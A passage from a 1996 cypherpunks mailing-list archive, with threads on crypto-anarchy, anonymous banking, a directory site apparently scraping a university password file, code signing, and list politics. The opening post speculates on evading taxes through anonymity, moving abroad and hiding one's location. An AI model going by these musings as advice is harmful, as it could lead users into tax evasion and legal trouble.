That's easy to get around- move to another country with another 
government. I've read here that the US government would try to tax you 
anyway, but it would be very difficult to collect... You could still 
anonymously work in the US or some other strong economy, by telecommuting.

Also, you can get around head taxes by not letting the government know 
where you are (easy with the anonymity thing). Travel tolls can be 
avoided by not traveling (telecommute instead). Land taxes are more 
difficult, since you kinda need a place to live, so maybe best to move to 
another country.

I'm not advocating tax evasion, I'm just saying it could become possible.

There's no guarantee that crypto-anarchy will come to be... I think the
crypto genie is permanently out of the bottle (or at least will be soon),
but if anonymous digital cash doesn't catch on, crypto anarchy won't be 
the same. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Snow <snow@crash.suba.com>
Date: Sun, 28 Apr 1996 16:13:50 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
In-Reply-To: <m0uCiBa-00094jC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960427220258.1445B-100000@crash.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996, jim bell wrote:
[...]
> and will be very hard to separate.  If it is possible to replace a keyboard 
> chip with a Trojan Horse, the one desired target will be far more identifiable.

	Why go thru all the hassle when software would be easier? Or a 
very small camera placed in the ceiling watching the keyboard? 

	It would seem to me that building a hacked chip that did 
_everything_ that the original did plus would be a lot more difficult 
(think Fab Plants, tool up costs, engineering) than just faking an alien 
abduction...


Petro, Christopher C.
petro@suba.com <prefered>
snow@crash.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 15:36:06 +0800
To: frissell@panix.com
Subject: Re: International Capital Flows Called Criminal
Message-ID: <01I41VP9IK728Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 25-APR-1996 14:36:03.76

>Now the last time I looked, 'Capital Flight' was as legal as church on a
>Sunday.  Or is this a proposal for exchange controls.  Is this guy a state
>or federal prosecutor?  He was also unable to come up with legitimate
>reasons for $3 Billion to go from Egypt to the Bahamas.  I can think of any
>one of a number of legal reasons, one being "International Tax Planning."

	As well as the taxes on those transferring their citizenship (which
rather give the lie to those who say to libertarians that we ought to just
move someplace else), there's also various limits on capital flow in other
countries. Perhaps he's wanting the US to back these? Preventing people from
taking their cash out of a country without economic development does reduce
the costs to the World Bank et al for development funding. Of course, it also
means that those people (generally the brightest ones in those countries) are
more likely to leave, and will bear the brunt of development failures.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 18:19:04 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.SUN.3.93.960427225005.24829J-100000@polaris.mindport.net>
Message-ID: <Pine.GUL.3.93.960427214213.9901G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Black Unicorn wrote:
> > > [Unicorn of Color:]
> > > Use a nym.
> >[Me:]
> > This doesn't necessarily help if you work or study at a large institution
> > (stanford.edu, for example).
> [Unicorn of Color:]
> I think you took my comment in a smaller scope than it was intended.
> 
> Use a nym.  If you want absolute privacy, work and study under a nym.
> It's hardly difficult, you just have to start early.

I disagree that it's "hardly difficult" for most normal people. There are
bits and pieces of helpful information around, but they tend to be in
tax-protester-type rags that also contain a lot of loony stuff guaranteed
to land you in jail. And many of them are just snake oil scams themselves.
You know the difference, but I'm only starting to learn to, and Joe Schmo
hasn't a chance.

Anyway, I can't work for an organization like Stanford University without
a real name and Social Security number. In theory, I suppose, that real
name and Social Security number don't need to be the only ones I have.

> Depending on someone else (university, employer, government,
> phonecompany etc.) to protect data for you is, in my view, foolish.

In this case, I am the "someone else." How do I behave responsibly when I
have thousands of people coming in every Fall with no clue about privacy
issues?

I have to go after the leaks. Of course I know that none of my clients has
any real security or privacy, but stopping such information from being
trivially available on public web servers at least helps stave off the
random nutcase. Restricting the field to more specific nutcases, with or
without official titles, helps with the threat profile.

It was an uphill battle just to delink identity, location, and DNS
registration. It used to be that you could pinpoint a student's name,
address, and telephone number by their personal computer's static IP
address. They weren't even told that this was possible. On yesterday's
lovey-dovey research/educational Internet where everybody trusted
everybody else, it was just more efficient for troubleshooters and system
administrators to know where everybody was. Now, it's a scarier world, and
we all know that, but it's tough convincing people to change a system that
works. 

My personal choice has been (near-) complete openness, because I
ironically feel more secure if it is trivial for certain very specific
nutcases to verify that I pose no threat to them. I do not wish my enemies
to be paranoid. Paranoid people break things. I've chosen the security of
the high ground rather than the secuurity of the cave. Of course, I'm
learning to keep my personal life personal, and one day, I might find it
useful to disappear.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Apr 1996 19:37:50 +0800
To: ptrei@ACM.ORG
Subject: Re: [NOISE] Re: Guardian angels, the decency brigade, and cyberserap
Message-ID: <m0uDOuV-000924C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:31 PM 4/27/96 -0700, CyberAngels Director : Colin Gabriel Hatcher wrote:
>Peter Trei wrote about my signature:
>>
>>It's this last sig-quote that bothers me. It's worth noting that, unlike
>>the other two, it has no attribution. It looks like an inversion of
>>Benjamin Franklin's:
>>
>>" They that can give up essential liberty to obtain a little temporary safety
>>  deserve neither liberty nor safety."
>>         - Historical Review of Pennsylvania
>
>It is an inversion of that quotation and it does indeed sum up our focus.
>It has no name on it because I switched it around to make a motto for our
>work.  Not that I disagree with Franklin though.  The comment is true both
>ways around.

I find that to be a disgusting opinion.  Quite to the contrary, I think that 
whenever it _appears_ that giving up "a little liberty" would provide more 
security, there are other ways of providing that same security that don't 
require any loss of liberty.

For just one example, it is well known that the "war on drugs" actually 
causes a great deal of street crime.  But a person who doesn't see this, or 
doesn't want to admit this might see that crime and conclude that some loss 
of liberty (like, for instance, giving the police the authority to stop and 
frisk all passers-by whenever they want) would improve safety.  What he 
doesn't admit is that by legalizing drugs nearly all of that crime would 
disappear, vastly improving safety.

So it's a false trade-off, in both directions.  Authoritarians may disagree.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 16:09:52 +0800
To: unicorn@schloss.li
Subject: Re: US law - World Law - Secret Banking
Message-ID: <01I41W3KEPEC8Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 26-APR-1996 01:19:03.47

>What has consistently alarmed me is the United States trend of extending
>her own moral and ethical standards world wide.  Granted the United States
>is the foremost world economic power, but the power to control markets and
>the political power to invade the sovereignty of other states are two
>distinct issues.  The United States is, in one form or another, attempting
>to homogonize the legal systems of the world to comply with her own
>concept of what is "right" or "fair."  This is disturbing.

	I have no problems with extending US sovereignty where it will improve
civil liberties. However, about the only place where it appears to do so is
going against child labor. Otherwise, every action of the US government in
this regard appears to have been to decrease civil liberties in other countries
(and, indirectly, in the United States).

>By no means are the states of the world united on the meaning of
>anti-trust, the appropriate levels of regulation therein, or the manner in
>which to enforce these segments of the law.  That the United States should
>seek to impose her own will and concepts on foreign states strikes me as
>the antithesis of this once noble power's call, indeed the central focus
>of her foreign policy, for the self determination of all nation states.

	Well, I wouldn't say that the self-determination of nation states
is the important part. Indeed, most of the cases in which "national
sovereignty" is used as an excuse are ones in which the other country is in
the wrong. German censorship and Tianenmin (sp?) Square are excellent examples.
If patriotism is the last refuge of a scoundrel, national sovereignty is the
last refuge of a scoundrel nation.
	I've deleted the rest of your statements because I essentially
agree with them.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 28 Apr 1996 15:59:31 +0800
To: adam@rosa.com>
Subject: Re: Internet Police Law (fwd)
In-Reply-To: <2.2.16.19960427165636.403fce62@sirius.infonex.com>
Message-ID: <IlUhh4_00YUvF_sswV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 27-Apr-96 Internet Police Law (fwd)
by Adam philipp@rosa.com 
> This seems to be an interesting developement in GA... With CP relevance.

I have quite a bit of info on this, including the text of the law, at:

     http://fight-censorship.dementia.org/fight-censorship/dl?thread
     =The+Day+the+Sites+Went+Out+in+Georgia?&after=2233

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 16:09:36 +0800
To: ml3e+@andrew.cmu.edu
Subject: Re: US law - World Law - Secret Banking
Message-ID: <01I41WVH0QN28Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ml3e+@andrew.cmu.edu"  "Michael Loomis" 26-APR-1996 07:40:10.88

>    I have been reading this list to get an idea where Declan gets some
>of his lunatic ideas and what Rich Graves says when he is not up to
>Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
>that the basic point of this list is some libertarian notion that tax
>evasion is a good thing.

	Well, actually it's on a lot of other things also, including ones that
those against censorship (I assume you're on the fight-censorship list, and
thus encountered both Declan and Rich?) should favor. Examples include
anonymous remailers and web pages (the deceanse (sp) project).
	Moreover, anonymous digital cash has applications to fighting
censorship. Applications include paying someone to remail information or to
put it on the web. c2.org, for instance, accepts even the present
semi-anonymous digital cash and offers anonymous web page hosting.	

>While I am not clear how serious of threat, if one at all, to a system of
>fair taxiation,

	That depends on how one defines "fair."

>since much of the talk could be simply bluff, I have been made glad for the
>first time for the War on Drugs.  This silly war--tragic in terms of its
>economic cost and its assault on liberty--at least has forces some
>government agencies to take you seriously enough to figure out how to derail
>your plans of tax evasion.

	Most of the tracking and other mechanisms discussed are even more of
a threat to liberty - most significantly privacy, although there are other
ones involved as well - and, indeed, to economic efficiency. A lot of the
proposed and/or instituted regulations can also be used to discourage various
politically unpopular but economically efficient operations; an example is
"capital flight."
	In other words, unless you really want to live under a set of laws as
restrictive as those in Communist China, support the cypherpunks.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 16:04:31 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Cell Kill 2
In-Reply-To: <9Bc3mD213w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.93.960427224620.24829I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 27 Apr 1996, Dr. Dimitri Vulis wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> > >       According to the Russian newspaper Izvestia, Mr. Dudayev
> > >       died while phoning an aide to King Hassan II of Morocco,
> > >       who had been asked by President Yeltsin to help mediate
> > >       an end to the war. Will any leader ever again be so
> > >       gullible?

Watch your attributation.  I didn't write this.

> ---
> 
> Dr. Dimitri Vulis
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 16:11:16 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.GUL.3.93.960427163753.9454D-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.93.960427225005.24829J-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, Rich Graves wrote:

> On Sat, 27 Apr 1996, Black Unicorn wrote:
> 
> > On Sat, 27 Apr 1996, Sentiono Leowinata wrote:
> > 
> > 
> > > I wonder how they can get the e-mail address? Our finger daemon are
> > > blocked. Many un-broadcast e-mail addresses (the account never send any
> > > e-mails to anyone) are in the database. How?
> > > Furthermore, isn't it also privacy invasion?
> > > Would any hackers or expert people kindly to tell me how to block
> > > further threat like this?
> > 
> > Use a nym.
> 
> This doesn't necessarily help if you work or study at a large institution
> (stanford.edu, for example).

I think you took my comment in a smaller scope than it was intended.

Use a nym.  If you want absolute privacy, work and study under a nym.
It's hardly difficult, you just have to start early.

The bottom line is if you want privacy you have to work for it.  You are
screwed the moment you give your information to anyone.  The first
transfer you have puts information into the system regardless of the legal
'protections' that say otherwise.

Treat your personal information as you would a trade secret.  Once it's
out, it's out.

Depending on someone else (university, employer, government,
phonecompany etc.) to protect data for you is, in my view, foolish.

Do it yourself.

It may seem extreme, but it is the only way to be certain.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 28 Apr 1996 16:23:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Anonymous banking
In-Reply-To: <01I41RMZUD188Y52ZX@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960427225726.24829K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Apr 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-APR-1996 21:06:33.48
> 
> 	Thank you for the information.

Sure.

> 	Speaking of attorneys, is there any way that an attorney can serve as
> an anonymous mail forwarder? The user would give the attorney permission to
> look at anything suspicious (e.g., mail from a credit card company) to make
> sure no fraud, theft, et al were being committed. Would this be covered under
> lawyer-client confidentiality in the US?

Well, using attorney client confidentality to shield things otherwise
discoverable just doesn't work.

There are many mail forwarding services that don't use attornies.  An
attorney is going to charge you by the hour for this service.  I don't
think you really want to pay for it.

> >In general adding a country to the money laundering offender list is a
> >political decision and NOT demonstrative of a country's actual money
> >laundering use.  (Note that Vanuatu is not included, nor is Isle of Man).
> >Mostly its a question of countries with corrupt officials who will look
> >the other way, not of countries which strict banking privacy.
> 
> 	Fascinating.

Common sense really.  This is a fact of life when dealing with the
political arms of the United States.

> >This is nearly irresponsible reporting.
> 
> 	Reporters nowdays are getting so overloaded that they're taking
> information from whoever will talk to them. Look at what happened with the
> chips-in-Iraqui printer story.

Yep.

> 	-Allen
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Apr 1996 16:56:39 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption utilities
Message-ID: <01I41XUCBC4W8Y5319@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I thought the following from CuDigest should serve to illustrate some
of the discussion recently on this subject.
	-Allen

>>>>>>>>>>>>>>>>>>>>>>>>

Computer underground Digest    Sun  Apr 21, 1996   Volume 8 : Issue 32

[...]

Date: Mon, 8 Apr 1996 10:50:41 -0700 (PDT)
From: Doc_Holliday@AWWWSOME.COM(M. Steven McClanahan)
Subject: File 3--Canadian "criminalization of technology"

[...]

Speaking as one who had a Power Macintosh with a 2 gigabyte hard disk drive
and all my backups subpeonaed in a civil case, I can tell you that the
other side is not likely to want or accept your help in determining what is
on your mass storage devices and/or in learning how your systems work. I
had to stand by while the attorney corrupted all the data on my hard drive
trying to beat my PGP encryption. Then he did the same thing to my back
ups. Despite my protests I would have GIVEN them the key to decrypt the
data - he didn't trust me. This is in a CIVIL case, imagine how they would
feel in a CRIMINAL matter.

They spent days trying to get past PGP and could not. Even if they had, all
they would have gotten was copies of email between my wife and I. The
downside was it took me two weeks to reconstruct my hard drive, time which
the courts refused to order the attorney that started all this to pay me
for. (They did sanction him after he threatened to punch me during a
deposition for refusing to reveal my sources - which were protected by
attorney-client privilege - which I thought was interesting; apparently he
could waste all my time, but he couldn't hit me.) The court decided my data
had no value and that having to rebuild my hard drive was a "minor
inconveneince" compared to the "interests of justice."

Since it is a no win situation, extending cooperation is problematic. It
probably won't do any good. My experience told me most people in law
enforcement have not advanced, technologically, past the level of an Atari
2600 and are completely baffled by complex systems. Based on what they did
with a Mac system, I doubt they would even be able to access anything now
that I use a SPARCstation 4.

An attitude seems to have developed in the prosecution of computer crime
that "the ends justifies the means." As the voters have gone along like
sheep and surrendered many civil rights in the prosecution of drug related
crimes, they are similarly doing in the prosecution of computer crimes
having to do with the Internet and claims of "child porn." This is
extremely dangerous as. If you look long and hard enough on any system,and
systems accessible to it, you can, eventually, find something that will
offend someone. Therefore, applying the rule that "the ends justifies the
means," everyone who connects to a computer network is thereby
"criminalized."

The frigthening part is that, whether or not the innocent victim is doing
anything illegal, the reams of good press such actions bring for
prosecutors and police just encourages them. After it is all through and
nothing illegal is found, law enforcement still looks good in the press,
(because the public has been whipped up into such a frenzy they preceive
any action as "good"). The victims of such harassment are always "guilty"
in the eyes of the public, simply because the government took any action.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 18:54:40 +0800
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Mindshare and Java
In-Reply-To: <01BB34A1.56D52990@bcdev.com>
Message-ID: <Pine.GUL.3.93.960427230932.9901J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, Blake Coverett wrote:

> > "Trust" really isn't the right word for what I'm getting at. Microsoft's
> > digital signature initiative is basically FUD with the spin "Only stuff
> > signed or endorsed by Microsoft is going to work," but I don't think that
> > this spin is inherent in signed code initiatives generally.
> 
> At the risk of being rude... I you had actually looked at the system in
> question you'd realize that your statements above are sheer nonsense.

This is cypherpunks, and you think you need to apologize for being rude?

You're right, of course. I was basing the above on a marketing paper on
the December TechNet CD. Since then, the people who do the real work
appear to have developed a reasonable system. 

Who, me, biased against Microsoft? Absolutely. Just keep that in mind.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sun, 28 Apr 1996 17:03:27 +0800
To: cypherpunks@toad.com
Subject: (FYI) Fraud On The Internet
Message-ID: <9604280324.AA22485@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: reagle@rpcp.mit.edu
>Date: Sat, 27 Apr 1996 23:03:22 -0400
>To: coredohrs@RPCP.MIT.EDU
>From: "Joseph M. Reagle Jr." <reagle@mit.edu>
>Subject: Fraud On The Internet
>
>
>Fraud On The Internet
>
>The National Fraud Information Center has begun collecting information
>about fraud on the Internet. As part of the effort to gather
>information and announce the project to Internet users, the NFIC has
>created its own Web site and is accepting information via e-mail. The
>Web site has links to state, federal and international law enforcement
>sites plus details of the Internet fraud program and how suspicious
>activity can be reported.
>World Wide Web: http://www.fraud.org/
>E-mail: nfic@internetmci.com
>_______________________
>Regards,            I, man, am regal; a German am I
>Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
>reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E
>
>
>
_______________________
Regards,            I, man, am regal; a German am I
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 28 Apr 1996 17:12:18 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
Message-ID: <199604280339.XAA07392@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by unicorn@schloss.li (Black Unicorn) on Sat, 
27 Apr 10:46 PM


>Watch your attributation.  I didn't write this.


True. The NYT op-ed author's credit:


   Robert A. Pape teaches government at Dartmouth College and
   is the author of "Bombing to Win: Air Power and Coercion in
   War."

----------


ET cites:


http://www.yahoo.com/headlines/960427/news/stories/chechnya_10.ht
ml


   Tension rose even higher after the Chechens announced that 
Dudayev, a
   former Soviet air force general, had been killed in a rocket 
attack as
   he spoke to a Russian parliamentarian on a satellite phone.


----------


Which leaves open who is spoofing who. Dimitri, are you 
laser-celling killfile disinfo?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 28 Apr 1996 18:06:28 +0800
To: cypherpunks@toad.com
Subject: Re: www.WhoWhere.com selling access to my employer's passwd file
In-Reply-To: <Pine.GUL.3.93.960427163753.9454D-100000@Networking.Stanford.EDU>
Message-ID: <9604280504.AA0285@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Rich Graves <llurch@networking.stanford.edu> writes:

  > What whowhere.com did (whoswhere was a typo, yes -- it was late,
  > and I was rather pissed off) was grab the password file...

Pretty apparent, when you discover that they have 167 matches for
"daemon", >>500 matches for "admin", etc., which don't return any
valid user email addresses...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sun, 28 Apr 1996 18:28:49 +0800
To: "'Rich Graves'" <llurch@networking.stanford.edu>
Subject: RE: Mindshare and Java
Message-ID: <01BB34A1.56D52990@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> "Trust" really isn't the right word for what I'm getting at. Microsoft's
> digital signature initiative is basically FUD with the spin "Only stuff
> signed or endorsed by Microsoft is going to work," but I don't think that
> this spin is inherent in signed code initiatives generally.

At the risk of being rude... I you had actually looked at the system in 
question you'd realize that your statements above are sheer nonsense.

-Blake (who posted a summary of the WinTrust stuff some weeks back)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Apr 1996 21:19:25 +0800
To: attila <attila@primenet.com>
Subject: Re: code vs cypher
In-Reply-To: <199604280552.WAA20878@primenet.com>
Message-ID: <Pine.GUL.3.93.960428005017.9901K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Apr 1996, attila wrote:

> ** Reply to note from hochiminh@alpha.c2.org 04/26/96  8:31pm -0700
> 
> = TC May was not the first person to substantialy digress from
> = chartered topics but he certainly "ran with the ball" when he
> = got his chance to expose his ignorance and intolerance of
> = other races and religions (the cypher-relevance or "charter
> = topicality of which always escaped me).  I was discouraged
> = by the encouragement given to the murder advocating moron,
> = Jim Bell to post his insance littany.
> =
>         as to jim bell, does this imply you believe in censorship?

No, it simply means he thinks that Bell is a loon. I thought that for a
while, too, but now I think he's simply politically immature, and into
novelty acts. I am also pleased to see Bell seem to learn and mature over
the last few months, as I know I have. Nobody is irredeemable. I have
never killfiled anyone, though I've ignored people from time to time as a
way of controllin gmy blood pressure.

Detweiler was right when he talked about the thin skins and huge egos
here. Why cry "censor" when somebody simply tells you to shut up? It's
called social pressure, and it's a good thing. You may respond to social
pressure however you wish. 

>         I think you are mistaken with your implication that tcmay is a
>    racist. Bigotry, etc. is usually created in the mind of a reader who
>    jumps to conclusions.

Likewise "PC." He may correct me if I'm wrong, but I think you are
mistaken in your implication that hochiminh means to imply that TC May is
a racist. "Ignorance and intolerance" are different animals entirely, and
speaking on a purely analytical rather than moral level, I believe these
terms are accurately applied to Tim's statements, especially about
non-English speakers and nuking the Japs.  But I recognize Tim's good
humor (in all three meanings), and think he's a great guy, as are most of
the inmates in this particular asylum. 

My parents and a couple of friends at work are right-wing fundamentalist
loons, and a couple of friends from school are left-wing multiculturalist
loons. From this vantage point, I learn a lot. It's really funny comparing
the presentation of left-wingers in right-wing propaganda to the
presentation of right-wingers in left-wing propaganda. It seems that
cypherpunks gets the worst extremes of both. Sometimes I play along (too
often, probably, so I'm learning how to resist being trolled -- Michael
Loomis's laughable "Rich Graves, Holocaust fetishist" was a good test),
sometimes I just sit back and watch.

>    I am somewhat older than tim, and I find the
>    politically correct revisionism even more humourous (and very
>    intellectually cheap):  vertically challenged, horizontally
>    challenged, mobility challenged, mentally challenged, or whatever
>    the current fads are.

You will see none of these terms anywhere but in failed trial balloons and
parodies of the supposedly politically correct, of course. It's really
amazing how a myth can take on a life of its own. 

The left has the same kind of ludicrous misconceptions about the religious
right. I'll tell my parents some of the things my leftist friends have
been told about some of the organizations my parents belong to, and they
say, huh? Tell a feminist what Pat Robertson says about feminists, and she
says, huh?

>    thoroughly disagree with quotas and preferences.  I have more than
>    an even tendency to call a spade a spade, and I may live where guns
>    tend to outnumber our many children, but the only way a stranger can
>    be bounced from my table is to interfer with grace --and there are
>    some, as they are attending for the extra plate which is always set,
>    who would protest that my prayer offends them. does anybody still
>    have manners?

I once met a guy in Hollister who did.

I still resent being packed off to church, and I certainly oppose state-
sponsored school prayer; but anyone who goes out of their way to ridicule
someone else's beliefs, or who intentionally disrupts someone else's
worship, is an asshole, IMHO.

>         tim finds humour in many things --and, he has the courage to
>    challenge the politically correct revisonism which is being shoved
>    down our throats by a bigger and bigger, but certainly not better,
>    creeping vine of vipers we call our government, which is nothing
>    more than a ship of fools.

I would agree with this wholeheartedly if you turned down the volume about
80%. I hardly think it takes that much courage to disagree with PC
excesses, especially the ones that don't exist, like this "vertically
challenged" bullshit. It certainly doesn't take much courage on the
cypherpunks list.

Admitting that you pray -- now, that takes courage, well, in polite
circles in California it does.

>         well, the premise may be correct on what cypherpunks drifts
>    into with the endless political back and forth --the open forum;
>    however, the creation of the cesspit is not one party's fault  --we
>    _all_ have contributed to the problem --which is compounded by
>    direct, on-line connections.
> 
>         so, how about a little moderation in all things?

I'm all for that. Anyone for a little croquet?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Allen B. Ethridge" <ethridge@Onramp.NET>
Date: Sun, 28 Apr 1996 18:53:53 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: [NOISE] Re: Guardian angels, the decency brigade, andcyberserap
In-Reply-To: <v01510106a9e30a91595f@[198.147.118.221]>
Message-ID: <v03006600ada8c4679a53@[199.1.11.202]>
MIME-Version: 1.0
Content-Type: text/plain


angels@wavenet.com wrote:
>Peter Trei wrote about my signature:
>>
>>It's this last sig-quote that bothers me. It's worth noting that, unlike
>>the other two, it has no attribution. It looks like an inversion of
>>Benjamin Franklin's:
>>
>>" They that can give up essential liberty to obtain a little temporary safety
>>  deserve neither liberty nor safety."
>>         - Historical Review of Pennsylvania
>
>It is an inversion of that quotation and it does indeed sum up our focus.
>It has no name on it because I switched it around to make a motto for our
>work.  Not that I disagree with Franklin though.  The comment is true both
>ways around.

No.  "Those who sacrifice security for freedom, will have neither" is
not consistent with Franklin's statement, nor is it true.  Security and
freedom are antithetical, and worse than that, security is always an
illusion.  But you can have your illusion, as long as you keep it out of
my life.  Censor yourself if you wish, but don't censor anything I might
want to look up.

>>People usually put in their .sigs quotes they feel sum up their personal
>>philiosophy. I guess soon we'll see 'Gabriel' give us some more words
>>to live by; these may be right up his alley:
>>
>>"War is Peace"
>>"Ignorance is Strength"
>>"Freedom is Slavery"
>>        - Orwell, "1984"
>
>:)  As a former teacher at the University of London department of adult
>studies, teaching history, politics and International Relations I can
>assure you I am very familiar with the history and belief of
>totalitarianism - and have opposed them all my life.

Yeah, right.

Although you don't seem to have mastered propaganda quite yet.

	allen
	ethridge@onramp.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard C. Carpenter" <rccarpenter@hol.gr>
Date: Sun, 28 Apr 1996 14:15:44 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Click here to become an International Arms Trafficker
Message-ID: <01BB34AA.0E2DFC40@dmbbs6.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


 "Declared Munitions Exporter & Trafficker, Nos. 27 _&_ 28" 

 (Not being a glutton, the first try didn't export crypto.)

 -RCC

================================================================
Key Fingerprint 7A 10 04 1C 81 60 96 FB  A1 5A 57 E7 CB 67 4B 06
PGP KeyID A5D1C931      ** public key available on keyservers **
================================================================

     "Government is actually the worst failure of civilized
     man.  There has never been a really good one, and even
